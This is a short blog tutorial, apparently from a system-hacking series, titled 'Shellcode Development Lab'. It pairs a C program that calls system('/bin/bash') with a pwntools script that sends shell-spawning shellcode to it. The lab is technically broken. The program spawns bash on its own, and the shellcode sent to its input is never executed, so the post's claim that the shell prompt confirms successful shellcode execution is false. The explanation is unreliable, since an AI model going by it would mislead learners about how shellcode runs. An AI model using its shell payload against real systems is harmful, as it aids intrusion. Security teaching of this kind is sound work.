strangerRidingCaml
Shellcode Development Lab 본문
728x90
Shellcode Development Lab
In this lab, we will learn how to write and execute custom shellcode for basic commands.
Lab Activities:
1. Writing Custom Shellcode:
To begin, let's create a simple C program that executes a basic shell command.
#include <stdio.h>
#include <stdlib.h>
int main() {
system("/bin/bash");
return 0;
}
Save the above code to a file named shell.c
and compile it:
$ gcc -o shell shell.c
Now, let's write an exploit script in Python using pwntools to execute our custom shellcode:
from pwn import *
# Craft the shellcode
shellcode = asm(shellcraft.sh())
# Create a payload with the shellcode
payload = shellcode
# Launch the exploit
p = process('./shell')
p.sendline(payload)
p.interactive()
Explanation of the Python script:
- We use
asm(shellcraft.sh())
to generate the shellcode for spawning a shell. - The shellcode is then used as the payload.
- We launch the
shell
binary and send the payload to execute the shellcode. p.interactive()
allows us to interact with the spawned shell.
2. Executing Custom Shellcode:
Execute the Python script and observe the shell is spawned:
$ python exploit.py
Once executed, you should have a shell prompt, confirming the successful execution of the custom shellcode.
'System hacking' 카테고리의 다른 글
Return-Oriented Programming (ROP) Lab (0) | 2024.05.07 |
---|---|
Frame Pointer Overwrite Attacks Lab (0) | 2024.05.07 |
Frame Faking and Fake EBP Lab (0) | 2024.05.07 |
Return-to-Libc (RTL) Exploits Lab (0) | 2024.05.07 |
Return-to-Shellcode Attacks Lab (0) | 2024.05.07 |